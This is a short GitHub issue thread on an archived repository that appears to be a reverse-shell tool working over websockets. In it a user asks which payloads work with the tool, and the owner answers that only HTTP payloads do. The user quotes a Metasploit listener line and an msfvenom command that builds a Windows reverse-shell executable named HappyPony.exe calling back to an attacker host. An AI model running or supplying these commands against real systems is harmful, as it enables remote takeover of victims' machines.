Skip to content
This repository has been archived by the owner on Mar 11, 2023. It is now read-only.

Just a quick question #3

Open
ejawhary opened this issue Jan 3, 2022 · 1 comment
Open

Just a quick question #3

ejawhary opened this issue Jan 3, 2022 · 1 comment

Comments

@ejawhary
Copy link

ejawhary commented Jan 3, 2022

Hi,

Awesome repo. What other payloads can be used with this.

I tried it out in my lab, it works with the python payload however I tried changing the listener as well as the msvenom payload to a windows stageless payload and it doesn't seem to work.

f.write("set PAYLOAD windows/meterpreter_reverse_tcp\n")

payload = "msfvenom -p windows/shell_reverse_tcp LHOST=" + lhost + " LPORT=80 -f exe > HappyPony.exe"

@CalfCrusher
Copy link
Owner

CalfCrusher commented Mar 22, 2022

Only payload that works is http, when i developed this tool i tried many payloads, but you need to remember that connection is made through this protocol to .ws so using a tcp payload or nc will not work

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants